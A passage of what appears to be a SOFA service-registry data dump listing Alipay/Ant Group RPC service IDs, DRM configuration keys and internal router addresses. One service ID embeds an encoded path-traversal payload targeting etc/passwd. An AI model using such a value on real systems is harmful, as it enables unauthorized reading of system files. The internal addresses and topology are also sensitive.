#SOFA","com.alipay.mservicesinspect.common.service.integration.mobileappconfig.MobileAppFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.geofencing.GeofenceService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.claimoperation.common.service.ClaimCaseSuspensionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficlimitcenter.service.facade.LimitPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igopcore.common.service.facade.api.base.OperationBaseDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:aduit_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.confmng.EbppInstAuthConfMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthmarket.common.service.facade.service.config.HealthMarketBizConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.multimonitor.service.UserTenantServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infostudio.facade.runtime.ability.AbilityRuntimeService:1.0:1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.sync.WorkTicketQueryCallback:1.0:processmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.cloud.osp.user.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.irisbizprod.facade.diagnose.trace.TraceDiagnoseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:appfuse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.RqySearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfinvest.facade.api.security.SecurityPositionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.49.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.checkroute.common.service.checkersdk.service.CheckerService:1.0:checkroute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.reportengine.MetaConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.definfund.facade.api.FundServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.aipSerialExecNumPerTable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.batchfund.common.service.facade.entrust.api.EntrustPaymentOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.pullInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:uniontrade@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmobile.common.service.marketing.facade.GiftInsuranceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.whiteCmdExpressions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.89.156.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.184.214#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.228.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.batchpayprod.service.facade.loan.CdbUserRecoverService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.biz.mwallet.pass.manager.TabGroupPassManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.AssistantDepartmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pfunddts.common.facade.api.ProblemDiagnosisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mwealthprod.common.service.facade.RegisterAgentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.service.facade.DataRecover:1.0:merchantsettle_data_recover@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ext.MessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.ampf.ExperienceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.210.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:appstore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfbrmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.recon.common.service.facade.fund.api.EditInstItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.risk.FaultInjectReceiptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.baitiaoprod.common.service.facade.query.BillQuery:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftCrowdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundFreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextTBaseCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.progov.service.api.asbi.AsbiTaskTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibank.mobiledsp.adapterservice.MobileAdapterService:1.0:bkdepbuss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbhomepage.common.service.facade.api.SceneQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.TextValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:asttshipcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.headguide.api.UserDynamicDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:aeicoreAssetPrepareService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.LifeAppStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfinancial.antchain.cloud.endpoint.facade.RestManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_WQ_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapires.facade.migrate.SupportOpenCmsMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.serverlessplan.ServerlessPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dss.dfs.DFSClientService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:autoinsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-23#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yuemaprod.common.facade.service.cdrm.CdrmUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.huaBeiCfg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.common.service.facade.api.EmotionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.service.config.MobileCodeConfigWriteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.ete.facade.BackendAnalyseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.pdcore.common.service.facade.api.conflict.ConflictRuleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.OpLogManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.MybankMemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.overseaprod.common.service.remit.RemitConfService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.pcard.VcpCardTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.146.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.TaskLevelService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrderLinkSyncArDRM.mirrorSyncAr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.84.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue38#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.quickrun.TaskRunningFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.FundShareSplitManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbatch.service.MYBKBizLicenseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.capability.common.facade.SysAbilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.rest.AnnaAssistantHttpRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insxhbprod.apportion.service.OverdueRepaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ilogin.common.service.facade.api.oauth.OAuthValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.89.156.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.weiboUser2AlipayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revol.core.service.facade.ScriptChecker:1.0:rgl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.GroupCzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.spi.facade.FinAssetAccessDataFacade:1.0:insxhb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emccenter.common.service.facade.api.PlanManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.fileParseRetryInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icsmng.service.facade.limitcenter.LimitConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@promohelix#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_100.88.65.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.zmmccore.dissent.service.facade.DissentOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.AssistantPermissionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.openid.OpenIdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.query.FinActionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdCardPropertyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ass.common.service.client.AssClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.193.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-kabaocore-pass-schedule#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mdeduct.common.service.facade.UserProtocolQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanGrantEncashConfigDrm.deferredEncashMinutesOnCrossDay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.69.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.icifTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finadvisorprod.common.service.facade.api.AdvisorSubAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.15.226.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.revcore.finaccenter_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WSOrderRecoveryDRMResource.startTimeIndex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.remedyClearTairKeys,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.yfxInClaim,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:fincapacity@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizops.facade.StampFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ALIPAYDWPORTAL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.integrationprod.common.service.facade.UserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.loginauth.facade.MobileLoginAuthReadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.api.MerchantBankCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_DEFAULT_UNIFORM_EVENT12#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","quotetradecore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbaservice.common.service.facade.partner.api.ProductIconFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.FingerprintImgService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.185.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.airquery.ConfigOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecocheck.common.service.facade.NoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcustcore.common.service.facade.api.PublicInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.openplatform.facade.applyorder.api.ApplyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.tag.TagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.InstSpAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.delivery.VoucherQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.biz.service.impl.msg.EventProcessor:1.0:hfCreateTaskProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.CrmMerchantQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zplayback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cardbin.common.service.facade.CardBinSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@antfarm#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","NS_Pub_Servers_TP_O_RULEUPD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.220.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_processCapitalFreezeCodeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintransfercore.common.service.facade.transfer.FinAssignDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.bff.StuffApplyOrderFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.aciamcore.common.service.facade.identity.TenantServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.custcenter.service.antg.facade.accesstoken.AgATKHavanaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:antmember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.file.api.FileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.16.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acticketcore.kernel.common.service.facade.CompatibilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:accountInstCodeSyncHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.service.facade.model.blood.BdmMetaProp2DescService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-charityprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinstockprod.biz.service.gw.trade.api.TradeConfigManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.UserTransferManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.bizindicator.AutoBizKeyIndicatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pvsofaserver:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.starstage.facade.StarstageTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.IndexEstimateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iremitprod.common.service.facade.api.RemitOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secutrade.common.service.facade.api.asset.AssetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.domain.manage.facade.api.DomainInstanceQueryLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.secucommunity:name=com.alipay.secucommunity.common.ldc.NewSecuCommunityLdcDrmConfig.openLDCSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.0.159.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.96.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.36.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.media.api.VideoListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.merit.MeritMonthQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.bops.InspectManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.openModifyCredentialsCancelStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frgcenter.common.service.facade.api.RiskRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finsign.common.service.facade.finauth.service.ExtAccountSignFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.mng.MaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.sub04:1.0@XFIRE@testcloud#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.protocol-https:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.displayAllowAddUp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.productcenter.common.service.facade.rest.RefundManageSofaRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.79.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.243.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:familycore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.product.VcpSystemConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.150.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.161.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.zcache.tbase.riskmngTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paymentmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.biz.manager.ExperienceAlarmRecheckManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PSBP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FixRedeemProdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:omoaidbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.208.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.socialopen.TaskUserDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityOrderAcceptFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.biz.trade.event.base.TradeEventHandlerTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.180.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.pushProd2Public,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.orderfront.common.service.facade.ArOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:antmember@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:payplus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.secdatacontext.common.facade.api.manage.DataSourceVOMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kabaoprod.biz.mwallet.pass.manager.PassManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudbox.facade.api.request.RequestUniformCallbackFacade:1.0:linke@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.snapshot.TaskSnapshotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.